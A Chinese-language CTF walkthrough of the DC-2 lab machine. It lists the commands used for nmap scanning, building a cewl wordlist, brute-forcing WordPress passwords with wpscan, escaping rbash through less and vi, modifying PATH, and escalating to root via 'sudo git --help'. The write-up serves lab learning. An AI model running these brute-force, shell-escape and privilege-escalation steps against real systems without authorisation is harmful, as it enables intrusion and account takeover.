下载在虚拟机部署后
主机发现

flag1

nmap -sT -v 192.168.1.246 -sV -O  -p-

我们在这发现开放了2个服务，直接访问80端口，发现重定向到域名/dc-2,去/etc/hosts 文件改一下就好。

打开页面，发现是一个wordpress的网站，发现flag1，提示用从cewl可以爬到密码

cewl http://dc-2 -w pwd.txt
cat pwd.txt && wc -w pwd.txt

cewl 密码长度可以指定的,得到一个238个密码的字典

既然是wordpress的网站，就用wpscan 去扫描

wpscan –-url http://dc-2 -P pwd.txt -e

-P 指定字典 -e 指定枚举选项，无参数是 vp,vt,tt,cb,dbe,u,m
发现 tom,jerry密码

flag2

登陆试试，登陆页面是http://dc-2/wp-login.php，也是wordpress默认后台登陆路径。
用Jerry登陆在page页面下得到flag2,tom登陆无果。

这个flag2表示WordPress可能存在漏洞，叫我们去找其他方法得到下一个flag

回到kali,刚刚的扫描结果中还开放了7744端口的ssh登陆，尝试用刚刚的账号登陆
jerry没有远程登陆权限。tom成功登陆

flag3

这是一个受限制的用户,查看一下flag3.发现cat 都没法使用。
rbash(restricted bash)，即受限制的 bash。这时候考虑如何绕过这个rbash。
rbash 提供的受限环境的安全程度取决于用户能执行的命令，很多命令都能调用外部命令，从而导致逃逸出受限环境。find,less,more,man,vi等都可以用来执行命令。
试一下，发现less可以使用。先看看flag3
less flag3.txt

这里提示用su。哈，先看看less。

less flag3.txt
!/bin/sh

很明显，rbash也限制了 ‘/’
发现vi也可以用

vi flag3.txt
:!bash id

vi 还有一种方法。

vi flag3.txt
:set shell=/bin/bash
:shell

得到一个该用户的bash，但是低权限。
看看能不呢suid提权。

find / -perm -u=s  2>/dev/null

没有可以已root身份执行的命令。
虽然得到一个可交互的shell,但是该shell还是属于一个受限的路径。改到/bin 以及 /usr/bin下

export PATH=$PATH:/bin:/usr/bin

命令可以用了

刚刚看到flag3，提示用su,先切换到Jerry看看。提示可以用git命令获得root权限

flag4

在/home/jerry目录下发现了flag4。no hints,哈，你这个git 我就当你是get命令

git提权

git --help mv

git --help 是默认调用more去查看帮助文档。所以回到more的提权，但是这里提示的是可以用sudo。

sudo git --help mv
!/bin/bash

得到root权限。去找最后一个flag吧

flag5

find /|grep "flag"